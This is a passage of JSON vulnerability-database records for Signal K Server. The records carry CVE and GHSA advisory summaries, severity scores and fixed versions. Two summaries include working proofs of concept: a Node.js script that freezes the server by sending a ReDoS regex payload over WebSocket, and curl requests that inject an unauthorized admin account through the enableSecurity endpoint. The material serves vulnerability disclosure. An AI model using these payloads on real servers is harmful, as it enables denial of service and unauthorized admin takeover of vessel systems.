"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234", "reference_id": "", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038" }, { "reference_url": "https://github.com/advisories/GHSA-qh3j-mrg8-f234", "reference_id": "GHSA-qh3j-mrg8-f234", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qh3j-mrg8-f234" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110924?format=api", "purl": "pkg:npm/signalk-server@2.24.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0" } ], "aliases": [ "CVE-2026-35038", "GHSA-qh3j-mrg8-f234" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jq2a-wxb1-dufm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49548?format=api", "vulnerability_id": "VCID-mg7j-punt-3yhj", "summary": "Signal K Server Vulnerable to Denial of Service via Unrestricted Access Request Flooding\nA Denial of Service (DoS) vulnerability allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a \"JavaScript heap out of memory\" error due to unbounded in-memory storage of request objects.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68272", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24609", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24667", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24723", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24733", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68272" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/55e3574d8266fbc0ed8e453ad4557073541566f5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/commit/55e3574d8266fbc0ed8e453ad4557073541566f5" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:06Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68272", "reference_id": "CVE-2025-68272", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68272" }, { "reference_url": "https://github.com/advisories/GHSA-7rqc-ff8m-7j23", "reference_id": "GHSA-7rqc-ff8m-7j23", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7rqc-ff8m-7j23" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23", "reference_id": "GHSA-7rqc-ff8m-7j23", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:06Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api", "purl": "pkg:npm/signalk-server@2.19.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-v11p-jkzw-vkar" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0" } ], "aliases": [ "CVE-2025-68272", "GHSA-7rqc-ff8m-7j23" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mg7j-punt-3yhj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90197?format=api", "vulnerability_id": "VCID-ndfm-uuf3-nbfg", "summary": "Signal K Server has an Unauthenticated Regular Expression Denial of Service (ReDoS) via WebSocket Subscription Paths\n## Summary\nThe SignalK server is vulnerable to an unauthenticated Regular Expression Denial of Service (ReDoS) attack within its WebSocket subscription handling logic. By injecting unescaped regex metacharacters into the `context` parameter of a stream subscription, an attacker can force the server's Node.js event loop into a catastrophic backtracking loop when evaluating long string identifiers (like the server's self UUID). This results in a total Denial of Service (DoS) where the server CPU spikes to 100% and becomes completely unresponsive to further API or socket requests.\n\n## Description\nThe vulnerability stems from flawed string-to-regex conversion in `signalk-server/src/subscriptionmanager.ts`. The `contextMatcher()` and `pathMatcher()` functions convert wildcard strings (e.g., `*`) into regular expressions to match incoming data against client subscriptions.\n\nWhile the code attempts to escape `.` and `*` characters, it fails to escape other dangerous regular expression metacharacters—such as `+`, `(`, `)`, `?`, `[`, and `]`. Because of this, an attacker can submit a crafted `context` that contains nested quantifiers (e.g., `([a-z0-9:-]+)+!`). When the server attempts to test this malicious regex against legitimate, lengthy data identifiers (like `vessels.urn:mrn:signalk:uuid:d384dc156010`), the regex engine fails to find a match at the end of the string but initiates billions of catastrophic backtracking operations trying to resolve the nested combinations. Since Node.js runs on a single-threaded event loop, this locks up the thread indefinitely.\n\n## Affected Code Blocks & Files\n**File:** `signalk-server/src/subscriptionmanager.ts`\n\n**Affected lines for Context subscriptions (282-300):**\n```typescript\nfunction contextMatcher(...) {\n if (subscribeCommand.context) {\n if (isString(subscribeCommand.context)) {\n const pattern = subscribeCommand.context\n .replace(/\\./g, '\\\\.')\n .replace(/\\*/g, '.*')\n const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: User input compiled into regex directly\n return (normalizedDeltaData: WithContext) =>\n matcher.test(normalizedDeltaData.context) ||\n```\n\n**Affected lines for Path subscriptions (276-280):**\n```typescript\nfunction pathMatcher(path: string = '*') {\n const pattern = path.replace(/\\./g, '\\\\.').replace(/\\*/g, '.*')\n const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: Same issue here\n return (aPath: string) => matcher.test(aPath)\n}\n```\n\n## Proof of Concept (PoC) Steps\n\n```\nconst WebSocket = require('ws');\nconst http = require('http');\n\nconst HOST = 'localhost';\nconst PORT = 3000;\nconst WS_URL = `ws://${HOST}:${PORT}/signalk/v1/stream?subscribe=none`;\n// Use the API endpoint to measure real server processing lag (requires JSON serialization)\nconst HTTP_URL = `http://${HOST}:${PORT}/signalk/v1/api/`;\n\nconsole.log(`[+] Target Server API: ${HTTP_URL}`);\nconsole.log(`[+] Target WebSocket: ${WS_URL}`);\n\nlet requestCount = 0;\n\n// Polling function to check server responsiveness and compute delay\nfunction checkServerStatus() {\n const startTime = Date.now();\n requestCount++;\n const reqId = requestCount;\n \n const req = http.get(HTTP_URL, (res) => {\n let size = 0;\n res.on('data', chunk => { size += chunk.length; });\n res.on('end', () => {\n const latency = Date.now() - startTime;\n console.log(`[HTTP #${reqId}] API responded in ${latency}ms (Data size: ${size} bytes)`);\n });\n });\n\n req.on('error', (err) => {\n console.log(`[HTTP #${reqId} ERROR] Connection refused/dropped.`);\n });\n\n // Timeout if the event loop is blocked\n req.setTimeout(2000, () => {\n console.log(`[HTTP #${reqId} TIMEOUT] Server is completely blocked! Node event loop is frozen.`);\n req.destroy();\n });\n}\n\n// Start polling every 1 second\nconsole.log('[+] Starting baseline HTTP polling...');\nconst pollInterval = setInterval(checkServerStatus, 1000);\n\n// Wait a few seconds to establish a baseline, then launch the ReDoS\nsetTimeout(() => {\n console.log(`\\n[!] Initiating WebSocket connection to launch ReDoS attack...`);\n const ws = new WebSocket(WS_URL);\n\n ws.on('open', () => {\n console.log('[+] WebSocket Connected! Sending catastrophic ReDoS payload...');\n \n // This regex exploits the unescaped Regex metacharacters in context matcher.\n // It forms: `^vessels\\.([a-z0-9:-]+)+!$`\n // When evaluated against `vessels.urn:mrn:signalk:uuid:xxx` (38+ characters), \n // the nested quantifier `([a-z0-9:-]+)+` will result in 2^38 evaluations \n // because it fails to find the '!' at the end. This reliably freezes V8.\n const pocPayload = {\n context: \"vessels.([a-z0-9:-]+)+!\",\n announceNewPaths: true,\n subscribe: [{ path: \"*\" }]\n };\n\n ws.send(JSON.stringify(pocPayload));\n console.log('[!] Payload sent. The server should instantly freeze. Watch the HTTP pollers now...\\n');\n });\n\n ws.on('error', (err) => {\n console.error(`[-] WebSocket Error: ${err.message}`);\n });\n\n}, 3500);\n\n// Automatically shut down the test after 15 seconds\nsetTimeout(() => {\n console.log(`\\n[+] Test complete. Stopping pollers.`);\n clearInterval(pollInterval);\n process.exit(0);\n}, 15000);\n```\n<img width=\"1003\" height=\"524\" alt=\"Screenshot 2026-03-29 101918\" src=\"https://github.com/user-attachments/assets/4b257c4c-f97a-4812-b812-ce2f235b6039\" />\n\n## Impact\n\nThis vulnerability achieves a complete **Denial of Service (DoS)** against the SignalK server. A single unauthenticated WebSocket connection can send the catastrophic payload, which permanently locks the main Node.js event loop. \n\n<img width=\"999\" height=\"153\" alt=\"Screenshot 2026-03-29 101820\" src=\"https://github.com/user-attachments/assets/54214d1c-252f-4533-ad02-14959ea2bed0\" />", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39320", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22678", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22587", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22633", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22694", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39320" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d" }, { "reference_url": "https://github.com/SignalK/signalk-server/pull/2568", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/pull/2568" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7gcj-phff-2884", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7gcj-phff-2884" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39320", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39320" }, { "reference_url": "https://github.com/advisories/GHSA-7gcj-phff-2884", "reference_id": "GHSA-7gcj-phff-2884", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7gcj-phff-2884" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111518?format=api", "purl": "pkg:npm/signalk-server@2.25.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.25.0" } ], "aliases": [ "CVE-2026-39320", "GHSA-7gcj-phff-2884" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ndfm-uuf3-nbfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49550?format=api", "vulnerability_id": "VCID-p96m-n138-a7c6", "summary": "Signal K Server Vulnerable to Unauthenticated Information Disclosure via Exposed Endpoints\nAn unauthenticated information disclosure vulnerability allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68273", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02939", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02956", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03009", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68273" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/ead2a03d8994969cafcca0320abee16f0e66e7a9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/commit/ead2a03d8994969cafcca0320abee16f0e66e7a9" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:48Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68273", "reference_id": "CVE-2025-68273", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68273" }, { "reference_url": "https://github.com/advisories/GHSA-fpf5-w967-rr2m", "reference_id": "GHSA-fpf5-w967-rr2m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fpf5-w967-rr2m" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m", "reference_id": "GHSA-fpf5-w967-rr2m", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:48Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api", "purl": "pkg:npm/signalk-server@2.19.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-v11p-jkzw-vkar" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0" } ], "aliases": [ "CVE-2025-68273", "GHSA-fpf5-w967-rr2m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p96m-n138-a7c6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49921?format=api", "vulnerability_id": "VCID-v11p-jkzw-vkar", "summary": "SignalK Server has Path Traversal leading to information disclosure\nA Path Traversal vulnerability in SignalK Server's `applicationData` API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The `validateAppId()` function blocks forward slashes (`/`) but not backslashes (`\\`), which are treated as directory separators by `path.join()` on Windows. This enables attackers to escape the intended `applicationData` directory.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25228", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05796", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05841", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05839", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05848", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25228" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:09:33Z/" } ], "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228", "reference_id": "CVE-2026-25228", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228" }, { "reference_url": "https://github.com/advisories/GHSA-vrhw-v2hw-jffx", "reference_id": "GHSA-vrhw-v2hw-jffx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vrhw-v2hw-jffx" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx", "reference_id": "GHSA-vrhw-v2hw-jffx", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:09:33Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73776?format=api", "purl": "pkg:npm/signalk-server@2.20.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-veqf-x77b-4bf7" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.20.3" } ], "aliases": [ "CVE-2026-25228", "GHSA-vrhw-v2hw-jffx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v11p-jkzw-vkar" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89977?format=api", "vulnerability_id": "VCID-xvyj-f4ps-kycx", "summary": "Signal K Server: Privilege Escalation by Admin Role Injection via /enableSecurity\n## Summary\n\nAccording to SignalK's security documentation, when a server is first initialized without security enabled, the **/skServer/enableSecurity** endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.\n\nHowever, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the **/skServer/enableSecurity** route remains perpetually open.\n\nFurthermore, the endpoint explicitly trusts the **type** field provided in the request body, passing it directly into the server's security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.\n\n## Vulnerable Root Cause \n\nFile: src/serverroutes.ts (Lines 685-754)\n```\nif (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {\n app.post(\n `${SERVERROUTESPREFIX}/enableSecurity`,\n (req: Request, res: Response) => {\n // ...\n function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {\n // [!VULNERABLE] Passes the entire JSON request body directly to the security strategy\n securityStrategy.addUser(config, request.body, (err, theConfig) => {\n // ...\n })\n }\n }\n // ... No code disables or removes this route after first execution.\n // The conditional check on Line 685 only happens during server startup, \n```\n\nFile: src/tokensecurity.ts (Lines 980-994)\n```\nfunction addUser(\n theConfig: SecurityConfig,\n user: { userId: string; type: string; password?: string },\n callback: ICallback<SecurityConfig>\n ): void {\n // ...\n const newUser: User = {\n username: user.userId,\n type: user.type // [!VULNERABLE] Blindly trusts the injected \"type\" field\n }\n```\n\n## Proof of Concept (PoC)\n\n**Simulate Legitimate Initial Setup**: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n -H \"Content-Type: application/json\" \\\n -d '{\"userId\": \"admin\", \"password\": \"securepassword\", \"type\": \"admin\"}'\n\nResult: Security enabled\n```\n\n**Inject Malicious Admin**: Send the exact same request again to create a second, unauthorized admin account. This should ideally be blocked because security was already enabled.\n\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n -H \"Content-Type: application/json\" \\\n -d '{\"userId\": \"attacker\", \"password\": \"password123\", \"type\": \"admin\"}'\n\nResult: Security enabled (The 